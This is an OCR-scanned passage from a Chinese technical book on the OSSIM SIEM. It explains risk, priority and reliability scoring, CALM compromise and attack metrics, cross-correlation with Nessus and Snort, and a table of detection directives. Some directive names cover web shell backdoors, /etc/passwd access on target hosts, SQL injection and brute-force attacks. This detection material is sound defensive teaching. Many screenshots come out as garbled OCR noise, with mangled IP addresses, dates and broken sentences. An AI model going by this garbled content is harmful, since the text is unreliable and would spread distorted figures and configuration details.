FE event X "P [f] riska., risk b. 字段 中 。 如 果 对 具体 算法 感 兴趣 ， 请 阅读 
/usr/share/ossim/include/classes/asset.inc 文件 。 

例如 ， 一 台 主 机 在 VLAN 链接 了 5 个 不 同 主机 的 445 端口 ， 这 可 能 是 正常 通信 ， 如 果 连 
接 了 15 台 机 器 的 445 端口 ， 这 就 比较 可 疑 了 ， 如 果 有 几 百 个 这 样 的 连接 并 且 持 续 时 间 很 长 ， 
那 就 基本 可 以 确定 是 受到 蠕虫 攻击 。 


4.4.2 Risk & Priority & Reliability 的 关系 实例 

在 我 们 收集 到 的 事件 中 , 多 数 情况 下 低 风 险 级 别 的 事件 占 多 数 ， 比 如 普通 的 扫描 事件 ， 以 
Cisco ASA 的 一 个 ICMP 事件 为 例 ， 其 PRIO=1，REL=1，ASET=2， 根 据 风险 模型 计算 公式 
4-1 计算 结果 近似 为 0。 这 种 扫描 事件 特征 和 原始 日 志 截 图 如 图 4-28 所 示 。 


ASSET 
SIGNATURE wDATEGMT7O0a SOURCE DESTINATION USERNAME e PRIO REL RISK 
SA: An ICI ssion olish thefast-path " » 

i 2050222201032 102000008 [rd immy EE i [] 


Fd 4-28 同时 显示 一 条 事件 的 风险 值 、 优 先 级 与 可 靠 性 数值 


这 种 低 风 险 事件 并 不 会 引发 报警 ， 如 果 是 Windows 下 的 蠕虫 对 445 端口 的 扫描 结果 就 大 
不 相同 ， 风 险 级 别 上 升 为 3， 如 图 4-29 所 示 。 


EVENT DETALS € 
DATE ALIENVAULT SENSOR. INTERFACE 
2015-03-22 17:34:16 GMT-7 00 Unknown 
RIGGERED SIGNATURE EVENT TYPE ID. CATEGORY SUB-CATEGORY 


dredive event: AV Nework scan| host win worm scanning ]benarior ox 10.02.72 30045 Aarm Scan 


NORMALIZED 
EVENT 
DATA SOURCE NAME PRODUCTTYPE DATASOURCEID 
direaire alert Alarm 1505 
SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT PROTOCOL 
Windows70 2802 120200161 445 TCP 
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PRIORITY RELIABILITY RISK 


mum, mmo (Hj 


UNIQUE EVENT ID ASSETS +D 


0ae83f4cdOr4-11e4-d441-22005513c69 


SRC USERNAME & DOMAIN SRC HOSTNAME SRC MAC DST USERNAME & DOMAIN DSTHOSTNAME DST MAC 
SIEN In 
empy empty empty 
SOURCE ADDRESS PRIORITY RELIABILITY — ACTMITY DESTINATION ADDRESS PRIORITY — RELIABILTY ACTIVITY 
REPUTATION 


10.070 10.200.161 


图 4-29 一 条 事件 对 应 的 详细 优先 级 与 可 靠 度 的 数值 


更 高 风险 的 事件 分 析 ， 例 如 木马 成 功 攻击 了 某 系 统 ， 这 时 风险 级 别 达到 5 UL E, FI 4-30 
中 显示 的 Risk 值 为 8， 系统 用 红色 醒目 字体 标 出 。 


GROUPED ay [Meam i] 
日 中 GROUP OWNER HIGHESTRISK DESCRIPTION STATUS 
Agree infection — Kay 四 an Tate 0 é 
ALARM NAME EVEVTS RISK DURATION source DESTINATION status 
= p System Compromise — Trojan infection — Kazy 2 0 0 secs Windows22:1043 国 69197.177.170https Open 
+ ALARM rsk DATE source DESTINATION CORRELATION LEVEI 
2 + AV Malware, trojan Kazy detected on windows22 2015-03-022209:09  windows22:1043 59197177.170:https 1 
Alarm Summary [ Taal Events: 1- Unique Dst IP^der: 1 - Unique Types: 1- Unique Dst Ports 1] 
2015-03-02 2209:09 — windows22:1043 国 59197177.170:https 2 


1 AV Malware, trojan Kazy detected on wirdows22 
Alarm Summary [Taal Events: 1- Unique Dst PAdér: 1 - Unique Types: 1- Unique Dst Ports 1] 
 OTaaal events matched after highest rule level, before timeout View/Edit currert directive d 


* d System Compromise— Trojan infection — Kazy 2 0 Qsecs windows22:1053 国 1931101636thttps Open 
UNIQUE EVENT ID ASSETS + D PRIORITY RELIABILITY RISK 
0ae83fdcc163-11e4-b441-22006c58303a mar gem | i 
EUN m SRC USERNAME & DOMAIN SRCHOSTNAME SRC MAC DST USERNAME & DOMAIN DSTHOSTNAME DST MAC 
emoy empy empty empty 
SOURCEADDRESS PRIORITY RELIABILITY ACTIVITY DESTINATION ADDRESS PRIORITY RELIABILITY ACTIVITY 
REPUTATION 

1921681.222 empty empyy 69197177170 empty empty empty 
= wa 

SOURE * A ue AE TRE | 

四 E ino 
EE "m mm o wm Ez 1 
wintows22. 192.168.1222 Alienvault San Mateo dud Tuni 
D m M H 
o ó 
LATEST UPDATE SERMCES USERS INFO State Game Ret) "Pe 
贝尔 蒙特 | 
2015-03-01 unenown, (retos rst 137) unknown, (dapr cpl389), D purs. 7 
144158 unknown, (microsoft-ds/cp| 445) 
mee 二 


100557 Mns ERP ceo ysoo0866g MAE REANA 


4-30 Risk 为 8 的 报警 事件 


在 OSSIM 平台 中 对 资产 的 哪些 特征 进行 监控 ? 大 家 可 在 OSSIM Web UI 下 Environment 
— Assets 进行 查看 ， 这 些 元 素 可 以 归纳 为 如 图 4-31 所 示 , 由 HIDS、Plugins、Netflow、Service 
等 元 素 统统 与 资产 相关 联 ， 这 与 黑客 攻击 成 功 与 否 有 着 直接 联系 。 
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(Pas) (HDs ) 
a — 
í 2 X / 
| Alarms. | N / Plugins ) 
am 
| Events 一 一 一 | — user) 
一 
( Service 一 Assets\ ~ Location ) 
^ b3 ~ pL 
— Pa E! 
(Vulnerabilities | | Netflow | 


图 4-31 资产 关联 特征 
一 次 成 功 的 攻击 ， 需 要 有 如 下 几 个 因素 : 
目标 主机 有 该 攻击 成 功 所 需要 的 漏洞 。 
操作 系统 匹配 。 
受 攻击 的 服务 在 运行 。 
端口 打开 。 
应 用 程序 在 运行 。 
以 上 这 5 个 因素 构成 了 攻击 图 ， 如 图 4-32 所 示 。 


00000 


432 ”构成 攻击 的 5 要 素 


很 多 企业 并 没有 花 时 间 去 将 他 们 的 内 部 资产 进行 整合 , 更 没有 关联 分 析 , 他 们 往往 关心 某 
一 个 方面 的 指标 , 例如 网 卡 的 流量 , 所 以 他 们 无 法 有 效 地 确定 可 疑 的 内 部 威胁 ， 以 及 周边 环境 
的 安全 性 。 

有 些 日 志 消息 本 身 具 有 优先 级 , 而 有 些 则 可 能 没有 , 原则 上 是 给 最 紧急 事件 最 高 的 优先 级 ， 
因为 有 些 低级 别 的 日 志 是 不 需要 关注 , 而 高 优先 级 日 志 才 需要 关注 , 如 果 每 个 日 志 消息 都 包含 
优先 级 信息 ， 那 么 开销 将 会 很 大 ， 下 面 看 个 简单 的 例子 。 

Cisco ASA with FirePower Services (思科 收购 Sourcefire 的 新 产品 ) 设备 产生 的 一 条 日 志 
如 下 : 


alienvault:/var/log# tail syslog 
Dec 28 19:46:19 IDS01 SFIMS: [CA IDS] [Policyl][119:15:1] http inspect: OVERSIZE 
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REQUEST-URI DIRECTORY [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 
10.12.253.4:55504 -> 94.15.224.60:80 

Dec 28 19:46:23 IDS01 SFIMS: [CA IDS] [Policy1][128:4:1] ssh: Protocol mismatch 
[Classification: Detection of a Non-Standard Protocol or Event] [Priority: 2] {TCP} 
56.16.69.166:59578 -» 10.87.156.248:22 


4.4.3 ”动态 可 信 度 值 Reliability 

在 关联 规则 中 Reliability (可 信和 度 ) 通常 有 个 初始 值 ， 试 想 如 果 Reliability 是 个 常量 ， 那 
么 在 动态 的 网 络 攻击 中 将 会 产生 大 量 误 报 , 在 引入 交叉 关联 机 制 之 后 , 就 将 网 络 安全 报警 和 具 
体 网 络 应 用 服务 、 开 放 端 口 、 开 放 端 口 的 漏洞 信息 进行 空间 上 的 关联 ， 以 便 确 定 攻 击 是 否 可 成 
功 ， 这 样 可 信 度 值 Creliability) 就 必须 为 变量 ， 对 于 那些 含有 不 可 能 存在 端口 安全 事件 的 ， 则 
直接 丢弃 ， 图 4-33 展示 了 Reliability 参数 在 OSSIM 关联 规则 的 变化 过 程 。 


Y ii Y 
Wem Sm de suu 
E o (Q5 wd. 
N N N | 


图 4-33 Reliability 参数 变化 过 程 


再 增加 可 信 
度 的 值 


4.4.4 查看 SIEM 不 同事 件 

在 第 2 章 讲 解 SIEM 控制 台 时 分 析 过 不 同日 志 的 显示 问题 ， 这 里 再 举 个 例子 ， 比 如 
W32.Sasser Worm. 是 一 个 尝试 探测 MS04-011 漏洞 的 蠕虫 (如 Microsoft 安全 公告 MS04-011 
文件 中 介绍 )。 它 会 由 扫描 随机 选取 的 IP 地 址 ， 进 而 传染 含有 漏洞 的 系统 ， 如 图 4-34 所 示 。 


(ERU Eg snort: "ET SCAN be 
VraHic, Potential Scan or Infection 


2-23 08:26:25 


E 2 1 2014-02-23 06:30:49 


2014-02-23 08:25:46 


7 1 1 2014-02-23 08:30:53 


434 查看 SIEM 不 同事 件 


因此 Risk 的 取 值 范围 为 0 一 10， 值 越 高 越 要 引起 关注 。 一 个 资产 的 可 靠 性 如 何 推断 出 
K? 是 由 资产 关联 和 操作 系统 类 型 、 端 口 、 协 议 、 服 务 名 称 以 及 版 本 综合 判断 。 例 如 ， 一 台 服 
务 器 安装 Redhat Linux 9, 且 启 动 了 Apache 服务 器 , 版 本 为 1.3.33, 服务 端口 80, 协议 为 TCP， 
此 时 OSSIM 根据 这 些 信 息 就 能 判断 其 可 靠 性 ， 目 前 来 看 这 样 配置 的 服务 器 可 靠 性 系统 会 达到 
100%， 也 就 是 存在 非常 大 的 隐患 。 

再 比如 ， 运 行 RPC 服务 的 UNIX 服务 器 被 冲击 波 蠕虫 所 攻击 ， 这 个 攻击 本 身 是 危险 的 ， 
它 曾 危害 成 千 上 万 台 主机 并 易于 传播 , 但 是 它 并 不 仅 对 该 台 服 务 器 造成 威胁 , 由 于 它 利用 了 一 
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个 严重 的 安全 漏洞 ， 因 此 它 具 有 较 高 的 优先 级 。 
在 实际 操作 OSSIM 系统 时 , 会 通过 Intelligence 一 Correlation Directives 下 Directives 选项 ， 
新 建 Directive 来 设置 优先 级 和 可 靠 性 ， 如 图 4-35 所 示 。 


Name for the directive Reliability 
ssh_attack 


coca EE Cancel || Back 


图 4-35 自 定义 优先 级 和 可 靠 性 


对 于 OSSIM 4.8 系统 中 默认 的 数据 源 优先 级 和 可 靠 性 也 可 以 调整 ， 具 体位 置 在 
Configuration 一 Threat Intelligence— Data Source。 首 先 ， 选 中 左边 的 数据 源 ID， 然 后 会 显示 如 
图 4-36 所 示 画 面 。 另 外 在 查询 SIEM 日 志 时 ， 还 可 以 将 其 加 入 到 数据 源 数 据 库 中 。 


al 网 RS E X 
onsneoApps Mis environment feronrs ——— 


THREAT INTELLIGENCE. ADMINISTRATION 
DEPLOYMENT 


POLICY ACTIONS PORTS DIRECTIVES  COMPLANCEMAPPING  CROSSCORRELATION | DATASOURCE TAXONOMY rN 
ru 


sHow (3878) zvrts TTE 
DATA SOURCE ID menee ~ crteory suscarecory QUSS nave $ PO o Rm — 0 
E ^6 Maare Trian miscedy ER IERI GA no 
E em "ma 
1001 6087 Maware Trojan peed ojan 20 runtime [15 G 
i v uei ) 073 1a 
"BACKDCOR a 
101 a Trlan tae  momnaomeeme — (13) G9 na 
My dinners 
mancora, — 
Wi $5 num Tm ge MSS. — (v3 Ga 
i My cn ig 
mancora 
m [^ itan ma Tob aan 2o ntre (3 (79 [T] 
mmo Mey eh = = 


4-36 ”对 现 有 策略 的 优先 级 和 可 靠 性 的 调整 
在 OSSIM 系统 中 ,如果 一 个 资产 的 风险 值 宇 1， 则 关联 引擎 将 Alert 升级 为 Alarm 并 发 出 
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告警 ， 同 时 为 区 别 其 他 低 风 险 ， 会 用 其 他 颜色 标记 。 换 句 话 说 ， 如 果 我 们 在 前 端 Web 界面 上 
发 现 Alarm 占 多 数 ， 就 要 仔细 查找 原因 ， 大 家 在 系统 中 发 现 Alarm 要 引起 高 度 注意 ， 极 有 可 
能 为 入 侵 行为 。 

如 果 控 制 台 在 远 端 (分 布 式 的 情况 )， 那 么 Alert 将 通过 E-mail 通知 给 管理 员 (admin 用 
户 )。 下 面 如 图 4-37 所 示 , 通过 Web 界面 来 看 看 如 何 快速 找 出 Alarm。Alert 在 Syslog 协议 中 
定义 为 紧急 消息 ， 我 们 知道 Snort 具有 实时 报警 功能 ， 可 以 将 报警 发 送 到 日 志 ，Alert 在 Snort 
规则 中 应 用 广泛 。 


Er - ME Pr NM 
Uweseiawm MEEN — $3 test SIEM Activity 


4-37. ”健康 程度 告警 信息 


dA 在 开源 版 OSSIM 中 会 出 现 AV-FREE-FEED 类 报警 ， 它 们 代表 AlienVault 公司 免费 il 
o He 


OSSIM 系统 风险 度量 方法 


4.5.1 风险 判定 
信息 安全 风险 是 威胁 利用 脆弱 点 对 一 个 信息 资产 造成 损失 的 可 能 性 。 通常 , 信息 安全 风险 
值 的 大 小 与 信息 资产 的 价值 、 面 临 的 威胁 及 其 具有 的 脆弱 性 密切 相关 。 在 OSSIM 系统 中 还 采 
用 了 一 种 叫做 CALM 的 关联 方法 ， 所 谓 CALM 的 全 名 为 Compromise and Attack Level 
Monitor， 该 算法 通过 积累 事件 ， 并 定时 恢复 风险 值 来 获得 当前 的 安全 状态 。 每 台 主 机 都 有 一 
个 Risk_A 值 和 Risk_C 值 ， 它 们 含义 如 下 : 
€ Risk A: 表示 该 对 象 正在 被 攻击 ; A 表示 level of attack， 它 意味 着 检测 到 了 某 攻 击 ， 
但 是 对 于 此 攻击 成 功 与 否 并 不 能 确定 。 
€ Risk C: 表示 该 对 象 已 被 攻击 ; C 表示 level of compromise, compromise /& € X 
协 ， 这 里 代表 系统 受到 危害 (或 已 受 损 害 ) 。 所 以 C 的 含义 为 某 攻击 已 成 功 。 


在 OSSIM 的 Alarm 报警 中 显示 “System Compromise” , 代表 系统 遭受 攻击 ， 需 要 管理 员 
马上 响应 ， 这 些 攻击 数量 、 频 率 、IP 地 址 、 端 口 、 关 联 等 级 和 时 间 等 信息 被 记录 到 C fH. TE 
系统 中 C、A 的 值 越 大 ， 表 示 系 统 风 险 越 高 。 

在 OSSIM 系统 中 , 通过 Dashboards 一 Risk 一 Risk Metrics 查看 Riskmeter 可 以 掌握 全 局 的 
C/A 情况 。 在 OSSIM 4.8 版 本 中 直接 单 击 Dashboards 一 Overview 下 的 Threat Level 圆 形 图 像 

(默认 为 I ow， 再 往 后 发 展 依次 变 为 Precaution (和 警惕)、Elevated( 提 高)、High、Very High) 
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即 可 打开 Risk Meter， 如 图 4-38、4-39 所 示 。 


THREAT LEVEL 


hnnan pnie 
( 11 34 46 
ERA e Pu 


3 E 


4-38 威胁 级 别 的 变化 


OVERVIEW 


Last day | Last week | Last monti 
Global admin Metrics 
En RISKMETER SERVICE LEVEL 
* pie 
» 
- p 
2 -一 一 一 一 一 下 < 
b = 
EEN Ti 
asua m Com renise. 
COMPROMISE ATTACK 
comi CLORAL 
CLOBAL MAX DATE MAX — CURRENT CLOBAL MAX DATE MAX CURRENT 
GLOBAL SCORE Wa 2015-01-30 01:10:00 GLOBAL SCORE lio 2015-01-30 01:10:00 
NETWORKS OUTSIDE CROUPS NETWORKS OUTSIDE GROUPS 
NETWORK ATE MAX CURRENT NETWORK MAX CURRENT 
PvLol0 213 - PvLolo B 
PvL172 ua PvL177 加 
Pvt 192 a Pvt 192 uà 
HOST ADDRESS MAX DATE MAX ^ CURRENT HOST ADORESS MAX CURRENT 
alienvaul i 2015-01-30 02:40:00 m T 
Host-192-168-91-131 团 3 2015-01-30 02:40:00 Bg 


4-39 Riskmeter 右 侧 的 Service Level 参数 


大 家 可 能 注意 Riskmeter 右 侧 的 Service Level 参数 ， 它 形象 地 表示 出 网 络 的 健康 值 ， 理 想 
状态 下 为 100%， 随 着 网 络 中 含有 漏洞 主机 和 服务 数量 的 增加 ， 这 个 值 就 会 不 断 下 降 。 

前 面 介 绍 过 动态 可 信 度 值 的 问题 ， 这 里 系统 中 处 理 C、A 的 值 也 是 采用 动态 方式 ， 它 会 
时 恢复 , 管理 员 只 关心 最 近 一 段 时间 内 的 风险 状况 ， 只 对 最 近 的 安全 事件 感 兴趣 ,而 不 用 考虑 
很 久 以 前 的 事件 ， 所 以 需要 引入 定时 恢复 的 机 制 ， 在 OSSIM 中 引入 时 间 间 隔 和 恢复 值 ， 每 隔 
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一 个 时 间 间 隔 (系统 10 秒 ) 所 有 对 和 象 的 Risk_A 和 Risk C 都 会 自动 减 1。 最 终 Thread level 
值 会 随 着 威胁 数量 的 减少 而 自动 降低 ， 如 图 4-40 所 示 。 


Page Refresh: - 10s 


GLOBAL 


= 
ll —————— - 1 20 A 


GROUPS 


NETWORKS. 


E NN 250A 
O C ———  O.L.-CEAA;übüuLUübomS57] 


LÁ———————————— ad 
Ho: A 加 A 


8 E 
ru d n - 11478 A 


图 4-40 ”查询 系统 风险 度量 值 


在 SIEM 控制 台 下 ， 当 鼠标 悬 停 在 RISK 位 置 ， 能 显示 出 C、A 的 值 ， 箭 头 代表 了 方向 ， 
如 图 4-41 所 示 。 


EVENTS 
ASSET 

SIGNATURE DATEGMT-400 SOURCE DESTINATION username — $555 prio REL RISK 
directive event: AV Malware, mm 
IRC bot detected on 2014005200329 — 192168.11.151:1118.— wm 148.81,111.121:65520 E> ja 
182.168.1115] 

stent Av Maware, — 

RC 20141005200329 19216811.151:1118 mg 14881.111.121:65520 — ppp Ez | 
1 
directive event: AV Malware, =. 
IRC bot detected on 2014.100520:0327 — 192168.11.200:1103 wm 148.81.111.121:65520 Ec ERE] 
192.168.1200 
directive event: AV Malware, E punan -- 
IRC bot detected on 2014-10.0520.0327 — 192168.11.2001103 ay 14881.111.121:65520 gc i snm ja 
192.168.11.200 


4-41 SEM 下 反映 出 的 C、A 情况 


4.5.2 ”事件 积 

每 台 主机 都 有 Risk_A 和 Risk_C, 那么 当 OSSIM 服务 器 接收 到 Sensor 传 来 某 主 机 的 Event 
后 ， 如 果 该 事件 是 从 主机 A 到 主机 B， 那 么 就 增加 A 的 RiskC 和 B 的 Risk A 值 , 如 图 4-42 
所 示 。 
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4-42 ”风险 值 变化 


接着 ,如果 该 事件 属于 攻击 响应 ,主机 A 和 B 的 Risk_C 都 增加 。 那 么 仅 从 Risk_ C fI Risk A 
的 数值 上 看 ， 数 值 越 高 ， 风 险 越 大 。 所 以 经 过 启发 式 关联 分 析 后 ， 系 统 就 得 到 一 个 综合 安全 指 
示 状 态 ， 系 统 默认 为 Low， 再 向 后 发 展 依次 为 Precaution (警惕 )、Elevated〈 提 高 )、High 和 
Very high. 

在 关联 分 析 中 , 对 于 基于 事件 的 关联 分 析 , 它 需要 定义 攻击 场景 , 所 以 只 能 检测 已 知 攻击 ， 
对 于 未 知 攻击 则 无 法 检测 ， 如 何 解 决 这 种 问题 呢 ? OSSIM 采用 前 面 介 绍 的 CALM 分 析 的 方法 
来 检测 未 知 攻击 ， 它 使 用 了 类 似 于 温度 计 的 风险 指示 器 〈 在 新 版 本 OSSIM 使 用 了 速度 表 的 仪 
表盘 ) 

基于 CALM 的 启发 式 关联 ， 以 大 量 事件 为 输入 的 前 提 下 ， 提 供 一 个 实时 的 C. A 值 输 
出 图 表 , 实时 反映 了 整个 网 络 的 安全 状况 。 我 们 在 首次 对 监控 网 段 的 设备 进行 资源 发 现时 , 可 
以 为 资源 池 里 的 设备 设置 C、A 的 临界 值 , 方法 是 在 Environment 一 Assets 一 Asset Discovery £i 
侧 资 源 池 中 输入 一 个 待 监控 网 段 ， 然 后 选 “Start Scan” 按 钮 ， 此 时 系统 开始 扫描 并 记录 下 发 
现 的 设备 ， 待 扫描 完成 会 列 出 设备 清单 ， 此 时 单 击 “Update Database Values” 按 钮 ， 目 的 是 更 
新 数据 库 ， 到 这 一 步 就 可 以 开始 设置 临界 值 了 ， 比 如 C、A 默认 设 定 为 30， 如 图 4-43 所 示 。 


Please, fill these global properties about the hosts you've scanned 


Optional group name 


£2192.168.11.29 (al 
£2192.168.11.117 
£2192.168.11.230 


ES E 
图 443 C、A 值 设置 
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OSSIM 中 的 关联 分 类 


事件 关联 (Event Correlation) 将 大 量 的 安全 事件 过 滤 、 压 缩 、 归 一 化 处 理 后 ， 再 提取 最 
重要 的 安全 事件 。 我 们 知道 内 、 外 部 入 侵 攻 击 行为 ， 都 有 逻辑 上 联系 。 黑 客 的 异常 行为 往往 分 
为 若干 步 又， 每 个 步骤 都 会 在 不 同 设备 和 系统 上 留 下 蛛丝马迹 ,将 这 些 事件 关联 处 理 ， 就 可 将 
所 有 的 相关 信息 相互 关联 ， 从 而 发 现 安全 隐患 。 


4.6.1 关联 分 类 
OSSIM 的 关联 主要 分 为 以 下 几 类 : 
€ 交叉 关联 (Cross Correlation) : 是 指 事件 与 目标 漏洞 之 间 的 关联 。 交 又 关 联通 过 将 
入 侵 检测 系统 Snort 产生 的 告警 信息 与 漏洞 扫描 工具 Nessus 规则 进行 交叉 关联 ， 综 
合 评估 威胁 程度 的 方法 ， 在 OSSIM 平台 也 是 将 snort 产生 的 告警 信息 与 Nessus 漏洞 
扫描 报告 进行 关联 分 析 。 
© 资产 清单 关联 (Inventory Correlation): 事件 与 目标 特性 之 间 的 关联 ( 包括 操作 系统 
关联 、 端 口 关联 、 协 议 关联 、 网 络 服务 名 关联 等 ) 。 前 提 条 件 是 资产 清单 中 需要 包 
含有 资产 的 特征 信息 ， 比 如 Snort 报告 某 个 机 器 出 现 Linux 漏洞 的 攻击 警报 ， 但 实际 
是 台 Sun 服务 器 ,那么 OSSIM 就 可 以 通过 关联 资产 清单 中 的 操作 系统 特征 ， 鉴 定 这 
条 Snort 的 报警 是 误 报 ， 当 然 策略 可 由 管理 员 来 制定 。 
OSSIM 的 关联 引擎 在 系统 中 扮演 着 重要 的 角色 首先 我 们 先 找到 其 位 置 对 于 OSSIM 4.6 
系统 位 置 为 Configuration 一 Threat Intelligence 一 Cross Correlation. 
下 面 是 查看 具体 规则 , 例如 EXPLOIT SSH server banner overflow (SSH Server 远程 缓冲 区 
溢出 漏洞 ) 的 关联 规则 ， 如 图 4-44 所 示 。 


THREAT INTELLIGENCE 


POLICY ACTIONS PORTS DIRECTIVES COMPLIANCE MAPPING CROSS CORRELATION DATA SOURCE TAXONOMY 


MODIFY CROSS-CORRELATION RULE 


DATA SOURCE NAME [snort 


REFERENCE DATA SOURCE NAME ( nessus 


EVENT TYPE EXPLOIT SSH server banner overflow 


REFERENCE SID NAME nessus: Checkpoint SecureRemote detection. 
ET 


4-44 交叉 关联 规则 


数据 源 来 源 于 检测 插件 ， 图 中 “EVENTTYPE” 数 量 达到 2 万 余 种 ， 所 以 显示 比较 慢 , 其 
信息 来 源 于 /etc/snort/sid-msg.map, Hi/usr/share/ossim/scripts/create sidmap.pl 脚本 程序 负责 调用 
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到 OSSIM-db 中 , 而 gid-msg.map 这 个 文件 内 容 主 要 和 Snort 规则 有 关 。 在 “Data Source Name" 
和 “Reference Data Source Name” 的 选项 中 都 提供 了 各 种 插件 ， 如 图 4-45 所 示 。 


Modify Cross-Correlation rule 


Data Source Name snort E 
sshd 
Reference Data Source Name |stonegate 
stonegate_ips 
sudo 
Event Type Suhosin 
Symantec 
Reference SID Name symantec-ams 
SymantecEPM 
syslog 
tacacs-plus 
tarantella 
tcptrack 
threshold 
tippingpoint 
trendmicro 


图 4-45 丰富 的 数据 源 及 插件 


4.6.2 ”关联 指令 分 类 


下 面 通过 关联 指令 分 类 表 ， 可 以 清楚 了 解 到 OSSIM 适合 检测 到 那些 攻击 类 型 ， 具 体内 容 
如 表 4-3 所 示 。 


表 4-3 ”攻击 检测 关联 指令 分 类 说 明 


分 类 解释 举例 


用 户 自 定义 User| 由 用 户 创建 /修改 的 | 由 用 户 创建 


Contributed 指令 ， 默 认为 空 
XX d 指 令 | 这 一 类 包括 指令 用 |AV Attacks, Successful OpenSSL HeartBeat attack 

Alien Vault 于 对 各 种 应 用 漏洞 |AV Service attack, successful WebDAV service exploitation on DST IP 
Attacks 进行 攻击 检测 AV Service attack, successful FTP service exploitation on DST IP 

AV Service attack, Microsoft SQL attack via web server against DST IP. 
Csp adduser) 

AV Web attack, web shell backdoor detected 

AV Web attack, SQL injection attacks detected against DST. IP 
AV Web attack, XSS attacks detected against DST. IP 

AV Attack, file /etc/passwd access on DST IP 

A H W 解 | 这 类 指令 包括 了 对 |AV Bruteforce attack, SSH authentication attack against DST IP| 


AlienVault 一 些 需要 认证 的 服 |(destination IP) 
BruteForce 务 , 例如 SSH 进行 |AV Bruteforce attack, Windows authentication attack against DST IP 
暴力 破解 攻击 AV Bruteforce attack, Windows authentication attack against DST IP 


(Snare) 

AV Bruteforce attack, HTTP authentication attack against SRC IP. 
AV Bruteforce attack, FTP authentication attack against SRC IP 
AV Bruteforce attack, HTTP authentication attack against SRC IP 
AV Bruteforce attack, FTP authentication attack against SRC IP 
AV Bruteforce attack, VNC authentication attack against SRC IP 
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2 
[z] 


AlienVault DoS 


Alien Vault Malware 


AlienVault Misc 


AlienVault Network 


拒绝 服务 攻击 | 该 类 指令 用 于 检 |AV Service attack, successful denial of service against IIS web server on 


一 一 OSSIM 最 佳 实践 


( 续 表 ) 


测 各 种 应 用 和 服 |DST_IP (MS07-041) 
务 的 拒绝 服务 攻 | AV Service attack, successful denial of service against Microsoft RDP 
击 service on DST IP 
|AV Attacks, Possible DDoS using SQL servers 

AV Service attack, successful denial of service against Samba server on 
DST IP 

AV Service attack, successful denial of service against MySQL server 
on DST IP (CVE-2009-0819) 

AV Service attack, successful denial of service against DST IP 
(MS06-035) 
AV Service attack, successful denial of service against Microsoft FTP| 
Service on DST IP (MS01-026) 


这 类 指令 用 于 检 |AV Malware, botnet Koobface activity detected on SRC. IP. (source IP) 
测 恶意 软件 攻击 [AV Malware, spyware VaccineKillerIU detected on SRC. IP 
AV Malware, trojan Swizzor detected on SRC IP 
AV Malware, DDoS trojan G-Bot detected on SRC IP 
AV Malware, IRC bot trojan IRCBrute detected on SRC IP 
AV Malware, mobile trojan HongTouTou detected on SRC IP 
AV Malware, worm Slammer propagation attempt against DST IP. 
AV Trojan Backdoor. Win32.Agent.bjjv - Operation Hangover detected 
on SRC IP 
AV Malware, PlugX DNS CC 
这 类 指令 用 于 检 |AV Misc, suspicious executable download from a dynamic domain on 
测 不 同 于 上 述 的 |SRC IP 
其 他 类 型 攻击 行 |AV Misc, EXE file download from a Dynamic DNS host 


这 类 指令 用 于 检 |AV Network attack, too many dropped inbound packets from DST IP 
测 网 络 异常 攻击 [AV Network attack, SYN flood detected on SRC. IP 

AV Network attack, UDP flood against DST IP 

AV Network attack, IP spoofing detected on SRC IP 

AV Network attack, port security violation on SRC IP. 


Alien Vault Policy 


这 类 指令 用 来 检 |AV Policy violation, vulnerable Java version detected on SRC. IP 
测 违反 策略 的 行 


AlienVault Scada 


该 类 指令 用 于 检 |AV SCADA attack, Modbus scanning or fingerprinting against 
dll SCADA 系统 |DST_IP， 这 类 规则 仅 10 条 
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AlienVault Scan 


( 续 表 ) 
该 类 指令 用 于 检 |AV Network scan, Nmap scan against DST_IP 


测 网 络 的 各 种 扫 |AV Network scan, local host scanning port 1433/TCP on SRC_IP 


AV Network scan, SSH service discovery activity from SRC IP 


AV Network scan, Wikto web vulnerability assessment tool usage 
against DST IP 

AV Network scan, SNMP default community string discovery detected 
from SRC IP 


AV Network scan, Microsoft Remote Desktop outbound scanning 
behaviour detected from SRC IP 


AV Network scan, host with worm scanning behavior on SRC IP 
AV Network scan, OpenVAS vulnerability assessment tool usage 
against DST IP. 


4.6.3 ”指令 组 成 


E 


有 件 中 每 条 指令 有 全 局 属性 以 及 一 个 和 多 个 规则 、 指 令 信 息 以 及 赋予 该 指令 对 应 的 知识 
库 。 下 面 先 看 一 条 指令 的 主要 属性 ， 其 结构 如 图 4-46 所 示 。 


展开 指 今 


局 用 /禁用 指令 


指令 名 称 
AV Bruteforce ati 


ientication attack against DST IP 
Delivery & Attack [Bruteforce Authentication, Linux/Unix|- Priority 4 
m Rm 
TN LT 


MN aT 


4-46 一 条 指令 的 全 局 属性 和 管理 选项 
每 条 关联 指令 包含 以 下 全 局 属性 : 


COD ID: 代表 指令 的 ID 号 ， 这 是 唯一 的 标识 符 ， 但 指令 的 ID 并 不 在 Web 界面 中 显示 。 
(2) Name: 事件 或 报警 名 称 。 


(3) Intent, Strategy 和 Method: 攻击 意图 、 策 略 、 方 法 。 该 项 主要 用 于 指令 分 类 。 这 三 
项 内 容 在 新 建 指令 过 程 中 就 能 发 现 ， 比 如 这 三 项 也 体现 在 Web UI 界面 的 Alarm 告警 示例 中 ， 
如 图 4-47 所 示 。 
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ALARMS 
LIST VIEW GROUP VIEW 
»5 ue 
15-03-28 — 15-04-03 4 — 15-04 4-11 — 15-04-1 4-18 — 15-04-24 15-04-25 — 15:05-01 15 
. e 
[35 v]r Xx 方法 


DATE ~ STATUS $ |INTENTE& STRATEGY € | verop $ RISK $ ATTACK PATTERN SOURCE 5 


$  DESTINATK 


ua 
20150411 — open — ()Porscan Nmap 1 一 61.240.144.67:60000 192168.11 


图 4-47 Alarm 中 显示 INTENT、STATEGY 和 Method 
(4) Priority 定义 了 对 检测 到 攻击 的 影响 ， 用 于 风险 评估 计算 。 前 面 讲 过 ， 由 指令 生成 的 
所 有 事件 都 有 自己 的 优先 级 ， 设 置 为 指令 的 优先 级 值 。 在 关联 指令 中 能 显示 优先 级 的 大 小 是 
USM5.0 之 后 提供 的 新 功能 。 指 令 种 类 说 明 如 下 : 
© RHIA: 该 按钮 可 以 展开 指令 中 的 规则 。 
e 启用 /禁用 指令 ， 启 用 指令 用 包 表示 ， 禁 用 指令 用 9€ 表示 。 每 次 操作 会 有 “The 


directive was successfully disabled/enabled” 提 示 ， 此 时 重启 服务 的 按钮 会 被 标记 为 红 
色 ， 提 示 用 户 重启 关联 引擎 ， 以 便 生 效 。 


